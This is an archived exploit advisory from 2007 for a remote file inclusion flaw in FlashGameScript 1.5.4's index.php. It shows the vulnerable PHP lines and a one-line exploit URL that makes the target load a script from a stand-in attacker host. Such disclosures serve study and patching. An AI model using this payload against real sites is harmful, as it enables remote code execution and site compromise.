FlashGameScript 1.5.4 - 'index.php?func' Remote File Inclusion

EDB-ID:

3360


Author:

JuMp-Er

Type:

webapps


Platform:

PHP

Date:

2007-02-22


Become a Certified Penetration Tester

Enroll in Advanced Web Attacks and Exploitation , the course required to become an Offensive Security Web Expert (OSWE)

GET CERTIFIED

         ___ ___                                        
_____   /   |   \            ___________   ______  _  __
\__  \ /    ~    \  ______ _/ ___\_  __ \_/ __ \ \/ \/ /
 / __ \\    Y    / /_____/ \  \___|  | \/\  ___/\     / 
(____  /\___|_  /           \___  >__|    \___  >\/\_/  
     \/       \/                \/            \/        


--------------------------------------------------------
Author          : JuMp-Er
Date            : feb, 21th 2007
Level           : Dangerous
contact:	: aH-crew[at]hotmail[dot]com
--------------------------------------------------------


Software description
--------------------------------------------------------
App             :FlashGameScript
Version		:1.5.4
URL:		:http://www.flashgamescript.com/
Price:		:$60
Description :
FlashGameScript: Flash Game Script is the latest arcade website script created by developers at ghoney.com and will be market by folks at FlashGameScript.com.
Our game site script is created to maximized arcade site owner.s profit with additional plug-in for alternative income opportunities.
-------------------------------------------------------


Vulnerability:
---------------
	     line 27: $absolutepath = $cfg[absolutepath];
at index.php line 28: $func =$_GET[func];
	     line 29: $pluginpath = $instdir."admin/plugins/";
---------------
Exploit:

http://www.somesite.com/index.php?func=http://attacker.com/evil_script?

---------------

Greetz to all members of active. Hacking Crew

# milw0rm.com [2007-02-22]